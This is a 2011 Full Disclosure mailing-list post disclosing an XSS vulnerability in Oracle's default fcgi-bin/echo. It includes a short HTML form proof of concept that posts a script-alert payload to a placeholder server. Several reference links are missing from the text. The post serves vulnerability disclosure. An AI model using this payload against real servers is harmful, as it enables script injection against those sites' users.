Home page logo

fulldisclosure logo Full Disclosure mailing list archives

XSS in Oracle default fcgi-bin/echo
From: paul.szabo () sydney edu au
Date: Wed, 23 Mar 2011 11:59:11 +1100

Long ago, I wrote about an XSS vulnerability in Oracle fcgi-bin/echo :
The issue may now be fixed in the latest versions of Oracle web servers:
So I now release the PoC for this vulnerability:

  <form action="http://server/fcgi-bin/echo"; method=post enctype="multipart/form-data">
  <input type=text name=xss size=50 value="<script>alert('XSS')</script>"><br>
  <input type=submit value="send">

The "traditional" form of a similar vulnerability
is claimed to have been fixed long ago, maybe in 
However that never was actually fixed by Oracle, but was fixed by
browsers that %-encode the query.

Another interesting reference:


Paul Szabo   psz () maths usyd edu au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • XSS in Oracle default fcgi-bin/echo paul . szabo (Mar 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]